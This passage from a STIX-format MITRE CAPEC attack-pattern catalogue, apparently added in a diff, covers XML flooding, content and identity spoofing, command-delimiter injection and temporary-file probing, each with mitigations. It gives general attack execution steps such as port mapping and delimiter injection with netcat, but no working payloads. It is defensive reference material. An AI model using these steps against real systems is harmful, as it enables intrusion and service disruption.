"2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: For applications that leverage remote schemas, use the HTTPS protocol to prevent modification of traffic in transit and to avoid unauthorized modification.", + "id": "course-of-action--64ccbe5a-017d-44f3-9f60-79e90c24af52", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-146-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--03fec1aa-4921-455b-89f5-01af59405338", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--64ccbe5a-017d-44f3-9f60-79e90c24af52", + "spec_version": "2.1", + "target_ref": "attack-pattern--ebf4bdc7-73dd-47c4-96e1-1ff471efbcd2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker initiates a resource depletion attack where a large number of small XML messages are delivered at a sufficiently rapid rate to cause a denial of service or crash of the target. Transactions such as repetitive SOAP transactions can deplete resources faster than a simple flooding attack because of the additional resources used by the SOAP protocol and the resources necessary to process SOAP messages. The transactions used are immaterial as long as they cause resource utilization on the target. In other words, this is a normal flooding attack augmented by using messages that will require extra processing on the target.", + "external_references": [ + { + "external_id": "CAPEC-147", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/147.html" + }, + { + "external_id": "CWE-400", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/400.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + } + ], + "id": "attack-pattern--94238840-08ad-4117-8a20-ed359cda1e7e", + "modified": "2018-07-31T00:00:00.000Z", + "name": "XML Ping of the Death", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--ad3913be-6ca6-48e6-9e3b-7b67e4162612" + ], + "x_capec_consequences": { + "Availability": [ + "Resource Consumption (DoS: resource consumption (other))" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Consider the case of attack performed against the createCustomerBillingAccount Web Service for an online store. In this case, the createCustomerBillingAccount Web Service receives a huge number of simultaneous requests, containing nonsense billing account creation information (the small XML messages). The createCustomerBillingAccount Web Services may forward the messages to other Web Services for processing. The application suffers from a high load of requests, potentially leading to a complete loss of availability the involved Web Service." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the target: Using a browser or an automated tool, an attacker records all instance of web services to process XML requests.

    2. Techniques
    Use an automated tool to record all instances of URLs to process XML requests.
    Use a browser to manually explore the website and analyze how the application processes XML requests.

Exploit

  1. Launch a resource depletion attack: The attacker delivers a large number of small XML messages to the target URLs found in the explore phase at a sufficiently rapid rate. It causes denial of service to the target application.

    2. Techniques
    Send a large number of crafted small XML messages to the target URL.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The target must receive and process XML transactions." + ], + "x_capec_resources_required": [ + "Transaction generator(s)/source(s) and ability to cause arrival of messages at the target with sufficient rapidity to overload target. Larger targets may be able to handle large volumes of requests so the attacker may require significant resources (such as a distributed network) to affect the target. However, the resources required of the attacker would be less than in the case of a simple flooding attack against the same target." + ], + "x_capec_skills_required": { + "High": "To use distributed network to launch the attack", + "Low": "To send small XML messages" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Build throttling mechanism into the resource allocation. Provide for a timeout mechanism for allocated resources whose transaction does not complete within a specified interval.", + "id": "course-of-action--098aadf6-648b-4c3a-bbf9-224e6bd430fd", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-147-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cfd5f6e5-9782-45a5-9d8c-a1883c4b6d34", + "modified": "2018-07-31T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--098aadf6-648b-4c3a-bbf9-224e6bd430fd", + "spec_version": "2.1", + "target_ref": "attack-pattern--94238840-08ad-4117-8a20-ed359cda1e7e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Provide for network flow control and traffic shaping to control access to the resources.", + "id": "course-of-action--ba0208fb-20e5-4c4f-9a93-d5d806d038e6", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-147-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2d06b870-3a8b-4f06-aa89-258fb7aec1e8", + "modified": "2018-07-31T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ba0208fb-20e5-4c4f-9a93-d5d806d038e6", + "spec_version": "2.1", + "target_ref": "attack-pattern--94238840-08ad-4117-8a20-ed359cda1e7e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary modifies content to make it contain something other than what the original content producer intended while keeping the apparent source of the content unchanged. The term content spoofing is most often used to describe modification of web pages hosted by a target to display the adversary's content instead of the owner's content. However, any content can be spoofed, including the content of email messages, file transfers, or the content of other network communication protocols. Content can be modified at the source (e.g. modifying the source file for a web page) or in transit (e.g. intercepting and modifying a message between the sender and recipient). Usually, the adversary will attempt to hide the fact that the content has been modified, but in some cases, such as with web site defacement, this is not necessary. Content Spoofing can lead to malware exposure, financial fraud (if the content governs financial transactions), privacy violations, and other unwanted outcomes.", + "external_references": [ + { + "external_id": "CAPEC-148", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/148.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + }, + { + "description": "Defacement", + "external_id": "T1491", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1491" + }, + { + "description": "Content Spoofing", + "external_id": "12", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Content-Spoofing" + }, + { + "description": "Content Spoofing", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Content_Spoofing" + } + ], + "id": "attack-pattern--bd4f8f46-1bc7-40a9-b15a-e36b7671cf5b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Content Spoofing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_can_follow_refs": [ + "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "attack-pattern--ae3f2c33-9018-442e-9cc3-24d65c7f4974", + "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "attack-pattern--8c806dfa-b8ca-45f9-9f97-09e4b5c1157b", + "attack-pattern--3491dd54-d586-4f3d-80c1-9576ee48236b" + ], + "x_capec_consequences": { + "Integrity": [ + "Modify Data (A successful content spoofing attack compromises the integrity of the application data.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--9d8a9dc3-5115-43c3-a5ec-8003e7b97b2e", + "attack-pattern--e7c0cce1-203e-454d-8a9a-76fa7ca120f8", + "attack-pattern--b2e8de4b-6757-4e7e-9c5c-210c44100577", + "attack-pattern--2e1be870-6442-4978-9a30-46d518aa1f74" + ], + "x_capec_prerequisites": [ + "The target must provide content but fail to adequately protect it against modification.The adversary must have the means to alter data to which they are not authorized. If the content is to be modified in transit, the adversary must be able to intercept the targeted messages." + ], + "x_capec_resources_required": [ + "\n If the content is to be modified in transit, the adversary requires a tool capable of intercepting the target's communication and generating/creating custom packets to impact the communications.\n In some variants, the targeted content is altered so that all or some of it is redirected towards content published by the attacker (for example, images and frames in the target's web site might be modified to be loaded from a source controlled by the attacker). In these cases, the attacker requires the necessary resources to host the replacement content.\n " + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker explores a target to identify the names and locations of predictable temporary files for the purpose of launching further attacks against the target. This involves analyzing naming conventions and storage locations of the temporary files created by a target application. If an attacker can predict the names of temporary files they can use this information to mount other attacks, such as information gathering and symlink attacks.", + "external_references": [ + { + "external_id": "CAPEC-149", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/149.html" + }, + { + "external_id": "CWE-377", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/377.html" + } + ], + "id": "attack-pattern--bddd2549-167f-4f7b-8d0f-6d1e647b26f6", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Explore for Predictable Temporary File Names", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--7fea6e82-183a-4811-9b71-1ebe4d6c8b11" + ], + "x_capec_child_of_refs": [ + "attack-pattern--323ed142-7793-413d-838f-72626caf58da" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "The targeted application must create names for temporary files using a predictable procedure, e.g. using sequentially increasing numbers.", + "The attacker must be able to see the names of the files the target is creating." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attack of this type exploits a programs' vulnerabilities that allows an attacker's commands to be concatenated onto a legitimate command with the intent of targeting other resources such as the file system or database. The system that uses a filter or denylist input validation, as opposed to allowlist validation is vulnerable to an attacker who predicts delimiters (or combinations of delimiters) not present in the filter or denylist. As with other injection attacks, the attacker uses the command delimiter payload as an entry point to tunnel through the application and activate additional attacks through SQL queries, shell commands, network scanning, and so on.", + "external_references": [ + { + "external_id": "CAPEC-15", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/15.html" + }, + { + "external_id": "CWE-146", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/146.html" + }, + { + "external_id": "CWE-77", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/77.html" + }, + { + "external_id": "CWE-184", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/184.html" + }, + { + "external_id": "CWE-78", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/78.html" + }, + { + "external_id": "CWE-185", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/185.html" + }, + { + "external_id": "CWE-93", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/93.html" + }, + { + "external_id": "CWE-140", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/140.html" + }, + { + "external_id": "CWE-157", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/157.html" + }, + { + "external_id": "CWE-138", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/138.html" + }, + { + "external_id": "CWE-154", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/154.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--582943a5-d66c-48a9-8cf8-76e511222c7d", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Command Delimiters", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--cde07b71-23e6-418d-93e9-665f5f83b032" + ], + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n By appending special characters, such as a semicolon or other commands that are executed by the target process, the attacker is able to execute a wide variety of malicious commands in the target process space, utilizing the target's inherited permissions, against any resource the host has access to. The possibilities are vast including injection attacks against RDBMS (SQL Injection), directory servers (LDAP Injection), XML documents (XPath and XQuery Injection), and command line shells. In many injection attacks, the results are converted back to strings and displayed to the client process such as a web browser without tripping any security alarms, so the network firewall does not log any out of the ordinary behavior.\n LDAP servers house critical identity assets such as user, profile, password, and group information that is used to authenticate and authorize users. An attacker that can query the directory at will and execute custom commands against the directory server is literally working with the keys to the kingdom in many enterprises. When user, organizational units, and other directory objects are queried by building the query string directly from user input with no validation, or other conversion, then the attacker has the ability to use any LDAP commands to query, filter, list, and crawl against the LDAP server directly in the same manner as SQL injection gives the ability to the attacker to run SQL commands on the database.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Assess Target Runtime Environment: In situations where the runtime environment is not implicitly known, the attacker makes connections to the target system and tries to determine the system's runtime environment. Knowing the environment is vital to choosing the correct delimiters.

    2. Techniques
    Port mapping using network connection-based software (e.g., nmap, nessus, etc.)
    Port mapping by exploring the operating system (netstat, sockstat, etc.)
    TCP/IP Fingerprinting
    Induce errors to find informative error messages

  2. Survey the Application: The attacker surveys the target application, possibly as a valid and authenticated user

    3. Techniques
    Spidering web sites for all available links
    Inventory all application inputs

Experiment

  1. Attempt delimiters in inputs: The attacker systematically attempts variations of delimiters on known inputs, observing the application's response each time.

    2. Techniques
    Inject command delimiters using network packet injection tools (netcat, nemesis, etc.)
    Inject command delimiters using web test frameworks (proxies, TamperData, custom programs, etc.)
    Enter command delimiters directly in input fields.

Exploit

  1. Use malicious command delimiters: The attacker uses combinations of payload and carefully placed command delimiters to attack the software.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--70c8a212-72da-4a98-a626-e5d38e5416e3" + ], + "x_capec_prerequisites": [ + "Software's input validation or filtering must not detect and block presence of additional malicious command." + ], + "x_capec_resources_required": [ + "Ability to communicate synchronously or asynchronously with server. Optionally, ability to capture output directly through synchronous communication or other method such as FTP." + ], + "x_capec_skills_required": { + "Medium": "The attacker has to identify injection vector, identify the specific commands, and optionally collect the output, i.e. from an interactive session." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Perform allowlist validation against a positive specification for command length, type, and parameters.", + "id": "course-of-action--e5c4fb82-e889-429a-a343-f75a01e515dd", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-15-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--08d4d25a-ee13-4f19-b709-f7bbafb7d0d9", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e5c4fb82-e889-429a-a343-f75a01e515dd", + "spec_version": "2.1", + "target_ref": "attack-pattern--582943a5-d66c-48a9-8cf8-76e511222c7d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Limit program privileges, so if commands circumvent program input validation or filter routines then commands do not running under a privileged account", + "id": "course-of-action--461e2128-8614-4665-acaa-4090f980504d", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-15-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3ab83c6e-5e54-4214-be2d-b4a9cb52405f", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--461e2128-8614-4665-acaa-4090f980504d", + "spec_version": "2.1", + "target_ref": "attack-pattern--582943a5-d66c-48a9-8cf8-76e511222c7d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Perform input validation for all remote content.", + "id": "course-of-action--8a996efc-52e0-4aaf-953a-21c3fe64c64b", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-15-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--78b9961e-bbb1-4c40-9286-e4eedbba14bc", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8a996efc-52e0-4aaf-953a-21c3fe64c64b", + "spec_version": "2.1", + "target_ref": "attack-pattern--582943a5-d66c-48a9-8cf8-76e511222c7d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Use type conversions such as JDBC prepared statements.", + "id": "course-of-action--d27b9ab5-05c1-40d5-9fc3-cbcd2c723a00", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-15-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--18b1ee44-40f2-43f7-97d1-56bde0108bbd", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d27b9ab5-05c1-40d5-9fc3-cbcd2c723a00", + "spec_version": "2.1", + "target_ref": "attack-pattern--582943a5-d66c-48a9-8cf8-76e511222c7d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits well-known locations for resources for the purposes of undermining the security of the target. In many, if not most systems, files and resources are organized in a default tree structure. This can be useful for adversaries because they often know where to look for resources or files that are necessary for attacks. Even when the precise location of a targeted resource may not be known, naming conventions may indicate a small area of the target machine's file tree where the resources are typically located. For example, configuration files are normally stored in the /etc director on Unix systems. Adversaries can take advantage of this to commit other types of attacks.", + "external_references": [ + { + "external_id": "CAPEC-150", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/150.html" + }, + { + "external_id": "CWE-552", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/552.html" + }, + { + "external_id": "CWE-1239", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1239.html" + }, + { + "external_id": "CWE-1258", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1258.html" + }, + { + "external_id": "CWE-1266", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1266.html" + }, + { + "external_id": "CWE-1272", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1272.html" + }, + { + "external_id": "CWE-1323", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1323.html" + }, + { + "external_id": "CWE-1330", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1330.html" + }, + { + "description": "OS Credential Dumping", + "external_id": "T1003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1003" + }, + { + "description": "Automated Collection", + "external_id": "T1119", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1119" + }, + { + "description": "Data from Information Repositories", + "external_id": "T1213", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1213" + }, + { + "description": "Data from Cloud Storage Object", + "external_id": "T1530", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1530" + }, + { + "description": "Credentials from Password Stores", + "external_id": "T1555", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1555" + }, + { + "description": "Data from Configuration Repository", + "external_id": "T1602", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1602" + } + ], + "id": "attack-pattern--797f4b4e-371a-4d06-9e98-5cccb8a7ebc1", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Collect Data from Common Resource Locations", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--913426fa-ea1f-43b0-8492-1d363ea109d6" + ], + "x_capec_domains": [ + "Software", + "Physical Security", + "Hardware" + ], + "x_capec_example_instances": [ + "An adversary can use a technique called Bluesnarfing to retrieve data from Bluetooth enabled devices in which they know where the data is located. This is done by connecting to the device’s Object Exchange (OBEX) Push Profile and making OBEX GET requests for known filenames (contact lists, photos, recent calls). Bluesnarfing was patched shortly after its discovery in 2003 and will only work on devices created before or during this time." + ], + "x_capec_parent_of_refs": [ + "attack-pattern--a20a3cc9-4a6a-4376-a2b4-777ee9df2a34", + "attack-pattern--af65cbd9-cc10-4c4f-9cc3-843941cdf357", + "attack-pattern--7fea6e82-183a-4811-9b71-1ebe4d6c8b11", + "attack-pattern--756a1a93-3734-426c-9e91-f9339de74a7a", + "attack-pattern--60ceb889-a284-44bb-ae05-4b7e347e1597", + "attack-pattern--ad242ccf-3578-4787-937c-22eb0ede3fb6", + "attack-pattern--140142cc-28cb-4506-bce6-b44128b7b9a7" + ], + "x_capec_prerequisites": [ + "The targeted applications must either expect files to be located at a specific location or, if the location of the files can be configured by the user, the user either failed to move the files from the default location or placed them in a conventional location for files of the given type." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. In some cases, the attacker need not even have direct access to the locations on the target computer where the targeted resources reside." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Identity Spoofing refers to the action of assuming (i.e., taking on) the identity of some other entity (human or non-human) and then using that identity to accomplish a goal. An adversary may craft messages that appear to come from a different principle or use stolen / spoofed authentication credentials.", + "external_references": [ + { + "external_id": "CAPEC-151", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/151.html" + }, + { + "external_id": "CWE-287", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/287.html" + } + ], + "id": "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Identity Spoofing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_can_follow_refs": [ + "attack-pattern--a9dc4914-409a-4f71-80df-c5cc3923d112", + "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427", + "attack-pattern--addd93c9-9278-4185-b402-e505d632c815", + "attack-pattern--9197c7a2-6a03-40da-b2a6-df5f1d69e8fb", + "attack-pattern--a390cb72-b4de-4750-ae05-be556c89f4be", + "attack-pattern--06e8782a-87af-4863-b6b1-99e09edda3be", + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d", + "attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f", + "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95", + "attack-pattern--05740120-81ef-4224-9805-2f0b54d1111f", + "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c", + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a", + "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170", + "attack-pattern--3491dd54-d586-4f3d-80c1-9576ee48236b", + "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ], + "Integrity": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Communications", + "Software", + "Hardware" + ], + "x_capec_extended_description": "\n Alternatively, an adversary may intercept a message from a legitimate sender and attempt to make it look like the message comes from them without changing its content. The latter form of this attack can be used to hijack credentials from legitimate users. Identity Spoofing attacks need not be limited to transmitted messages - any resource that is associated with an identity (for example, a file with a signature) can be the target of an attack where the adversary attempts to change the apparent identity. This attack differs from Content Spoofing attacks where the adversary does not wish to change the apparent identity of the message but instead wishes to change what the message says. In an Identity Spoofing attack, the adversary is attempting to change the identity of the content.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--862d18f1-a87c-4f1b-acc2-882697d5d6e5", + "attack-pattern--8711eca6-b3ad-40b7-b7ac-08be37885119", + "attack-pattern--d94762c1-3c78-47eb-8212-e0c770ba43a9", + "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285", + "attack-pattern--a00c2cc2-bd4f-4594-9ec1-b021b62ac896" + ], + "x_capec_prerequisites": [ + "The identity associated with the message or resource must be removable or modifiable in an undetectable way." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Employ robust authentication processes (e.g., multi-factor authentication).", + "id": "course-of-action--a4ee4981-07bd-4a5d-bc5b-3159e9005c04", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-151-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4e224ed0-2d80-495f-925d-d726a7fe4f81", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 